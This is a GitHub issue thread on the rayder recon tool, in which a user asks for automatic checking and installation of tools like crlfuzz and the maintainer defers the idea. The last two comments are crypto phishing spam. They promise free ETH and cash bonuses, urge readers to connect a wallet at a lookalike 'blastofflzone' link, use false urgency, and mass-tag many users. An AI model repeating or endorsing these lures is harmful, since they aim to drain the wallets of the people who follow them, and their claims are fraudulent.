### ISSUE TITLE
Check tools

### ISSUE THREAD

**Issue by omarkurt** [devanshbatham/rayder#4]
Hello,

Firstly thank for this simple and amazing tool. If you would like to use this workflow within the tools, please see: crlfuzz, subfinder, etc. Should be able to control the tools installed in the operating system.

**Comment by devanshbatham** [comment]
I don't quite understand your query. Could you elaborate?

**Comment by omarkurt** [comment]
I mean to say, for example if crlfuzz or related tool is not installed system. so rayder could after checked and will install crlfuzz or related tool.

**Comment by devanshbatham** [comment]
Not relevant right now, will think of it in near future.

**Comment by jguzej** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
hcgaptx, @gasoved, @juezhe, @Rajatjain241, @coodered, @syslink, @louisjiang, @rondoupo, @vinceferro, @kouvaliasnick, @075539, @Eason0424, @C-Band, @ngocloi93, @piesrtasty, @bgeils, @SAGZA, @ivan-koltsov, @aemartinez, @ljbljb123, @DonggeunYu, @alexandesigner, @Jaz-3-0, @dmytrochumakov, @cccxn, @UniqueBook, @jerrybaoo, @DeltaDea, @josheschulz, @nurul3101, @indrahalim, @lovecoding-git, @kevXZY, @pgcultra, @ArnoldIOI, @zakirkun, @stanleycyang, @keeslient, @briancorbinxyz, @uqee, @xottohub, @SauravTyagi1987, @maycuatroi, @CourageToGroww, @umex, @bradystibi, @crazyrabbitLTC, @RGHuang, @gabrpark, @parseen254massprogressive, @kovalika0, @otacleT, @bu, @ChristianECG, @xavier-brochard, @taka250, @scamilcar, @bangkokP, @halilkoca, @nickmura, @VIVEK-SUTHAR, @susyimes, @kbulte, @0xSY3, @adrian-petrykiw, @nmfretz, @fabricegeib, @automata-studio, @Fan03z, @mwilc0x, @gaspardip, @NerdyDave2017, @cccxn, @99Kies, @wangduheng, @sigridjineth, @EmanuelCampos, @joneskj55, @Akshat120, @vxdiazdel, @SOURAV-ROY, @limedroid, @kimanikelly, @jhrr, @sunstdot, @hktalent, @trungtaxp, @shoto290, @CBI1Alpha, @ayberk10, @brookzhou, @junekomori, @devenskoko, @jinsley8, @Ramanbaral, @JCLee777, @Kremed, @gryhkn, @Times125nel909son, @sanushen, @fzn0x, @NetOpWibby, @st2dii0, @BigMadCode, @likegogogo, @abusadms, @rappie, @githubsavelib, @Sefton4eva, @Blooninja, @sakusakudayo, @DhanushdhaariXP, @MENGLAI37, @cjxe, @biggvladik, @syed1ahmed, @SquirrellGod, @Melonisjy, @KaizenBChain, @tomking, @kor1b, @KBourdier, @Mathieu-Be, @yz89, @RYOYIP3017, @wmroar, @mbahar, @btspoony, @wixzi, @Michael77, @bibi45c, @trunghq3101, @pythoninthegrass, @laocoi, @maroua199525, @adamegyed, @liaopeiyuan, @Sebcuadros, @HogenYuan, @xiaohai, @tapired, @0x7C2f, @gabriele-del-monte, @gallantsa, @baxitfund, @khafidprayoga, @jackrieck, @lworld0x00

**Comment by avijit14** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
LokenderSarna, @vasiliy-vdovichenko, @niallmartin, @spiler, @dummy-account007, @codeogc, @sumeetghumare4, @verividivici, @paolodelia99, @johnpatrickroach, @wongkinger, @NELOUNI, @shunliz, @jasonx1e, @heibaidaolx123, @Limboy233, @hrrudnytro, @whoszus, @AMAYadav, @cintia-shinoda, @nagrao, @GuillemAmatCastello, @boykac, @sdurnany, @Sated, @micoudqu, @godlockin, @angonyfox, @meriem-gs, @potatossium, @sangkilpark-kidmam, @vedantog, @hamadalaqeel, @xiang-li-fin, @mori5321, @m4ttgit, @FranciscoRava, @zhoudiNEU, @maxto, @Houzhendong, @parandcor, @puwadon, @helxsz, @restj90, @spheregrid, @jknohr, @capitulation, @darwin403, @lingjzhu, @ivanmetrikintan9p, @sanjeev543, @SenzoEarl, @LeonardoEmili, @dubaiwen, @shouyisxty, @5l1v3r1, @xnnjw, @IfraSa, @Chang-SHAO, @AaronNing, @pwlprz, @Tarunadityaselva, @denhartog, @Jinming-Zhou, @wegamekinglc, @aakashkhindri, @HR-Habibur, @YuriPaglierani, @JManuelIzRa, @thess24, @trijuhari, @wagnerrd, @siddhantbhagat, @norma0b, @nicodds, @joaquimsnjunior, @fmilthaler, @farhanabi, @gusauriemo, @NLGRF, @hamdiRuwiss, @heisentberg, @Flag-C, @sushilkgec, @git-shogg, @GeorgeZard, @keshramjith, @sazio, @paolobriones, @zhuziyi1112, @rileycrane, @ugvfpdcuwfnh, @MislavSag, @deepu-peddineni, @HeyItWorked, @kennethhenry21, @vlatynski, @iattar, @TennisgawdMiss-Lonelyhearts, @louishuynh, @WojciechMigda, @salinsde, @mdn522, @turboyulin, @isdh, @minixalpha, @rjuez00, @soumyama, @DishinGoyani, @Leechael, @canalquant, @YihuZhang, @davidgturner, @neoblackxt, @YaBoyKamil, @andreabartolucci, @chrisimi, @kianyewn, @eleco, @ppkliu, @bharathijeeva, @pradeeproy303, @cwwonggg, @joetheace107, @epsilon34, @0987031613dow, @twais, @fibrou, @dxingda, @qzbayview, @chinchinhsieh1014, @ledmaster, @wudangt, @donaldjohn, @Charles0009, @Zagoshipda, @kevinshi97, @ShabbirHasan1, @deabas, @wadooodd, @eLoyyyyy, @LiJianying-723, @dsolsona95, @gerardtorrent97, @devindubin, @km5ar, @Aglaia11, @graceyangfan
